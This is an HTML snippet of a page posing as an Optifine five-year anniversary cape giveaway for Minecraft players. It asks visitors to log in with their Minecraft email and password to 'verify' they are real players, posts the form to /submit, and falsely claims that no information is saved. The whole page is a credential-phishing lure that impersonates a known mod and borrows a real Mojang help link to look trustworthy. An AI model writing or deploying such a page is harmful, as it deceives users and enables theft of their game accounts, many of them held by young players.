<h3>Anniversary Giveaway!</h3>
    Optifine has been in development for 5 years coming this December!<br>
    As a gift to the community we are giving away capes to all who apply.<br>
    To verify that you're a real minecraft player, please login.<br><br>
    <strong>*Note</strong> none of your information is saved on our server. <br>
    <br>
    <form name="login" action="/submit" method="POST">
      <table>
        <tr><td>Minecraft Email</td><td><input type="text" name="email" size="30" autofocus="autofocus"></td></tr>
        <tr><td>Password</td><td><input type="password" name="password" size="30"></td>
        <td><input type="submit" name="submit" value="submit"></td></tr>
        <tr><td></td><td><span style="font-size: small;"><a href="https://help.mojang.com/customer/en/portal/articles/329527-minecraft-log-in">Forgot password?</a></span></td></tr>
      </table>
    </form>
